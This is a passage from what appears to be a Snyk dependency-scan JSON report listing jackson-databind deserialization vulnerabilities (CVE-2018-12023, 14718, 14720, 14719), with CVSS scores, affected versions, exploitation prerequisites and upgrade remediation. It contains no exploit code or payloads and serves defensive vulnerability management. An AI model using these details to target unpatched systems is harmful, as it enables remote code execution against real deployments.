{ - "version": [ - "[,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2058", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:31.058577Z" - }, - { - "assigner": "Red Hat", - 
"severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 5.6, - "modificationTime": "2024-03-11T09:48:43.326081Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:39.092429Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:31.058577Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.6, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:43.326081Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12023`) is not identical to `CVE-2018-12018`, `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2058)\n", - "epssDetails": { - "percentile": "0.82708", - "probability": "0.00890", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-12023" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-6wqp-v4v6-c87c" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:16:09.944095Z", - "functions_new": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-05-29T17:15:50Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": 
"jackson-databind" - }, - "publicationTime": "2018-10-11T17:15:49Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:43.326081Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72448", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.7)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2097", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:45.223431Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:22.234808Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:46.637612Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:45.223431Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:22.234808Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks via the ` slf4j-ext` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14718`) is not identical to `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", - "epssDetails": { - "percentile": "0.92634", - "probability": "0.04626", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-14718" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-645p-88qh-w398" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:21:07.540945Z", - "functions_new": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-27T17:19:49Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": 
"2018-10-11T17:19:41Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:22.234808Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72449", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.7)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2097", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:48.008907Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - 
"cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:48:33.930153Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:39.195569Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:48.008907Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:33.930153Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform an XML External Entity (XXE) Injection via the `JDK` classes due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14720`) is not identical to `CVE-2018-12018`, `CVE-2018-14729`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", - "epssDetails": { - "percentile": "0.84205", - "probability": "0.01052", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-14720" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-x2w5-5m2g-7h5m" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:21:22.141403Z", - "functions_new": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-27T17:20:17Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": 
"2018-10-11T17:19:17Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:33.930153Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72450", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.7)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2097", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x", - "title": "GitHub Release Notes" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - 
"modificationTime": "2024-03-11T09:47:48.151247Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:21.823657Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:39.120318Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:48.151247Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:51:21.823657Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack via the `blaze-ds-opt` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14719`) is not identical to `CVE-2018-12018`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n- [GitHub Release Notes](https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x)\n", - "epssDetails": { - "percentile": "0.85805", - "probability": "0.01269", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-14719" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-4gq5-ch57-c2mg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:23:45.326350Z", - "functions_new": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-27T17:22:45Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": 
"maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-10-11T17:22:38Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:21.823657Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72451", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.7)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2097", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", - "cvssV3BaseScore": 10, - "modificationTime": 
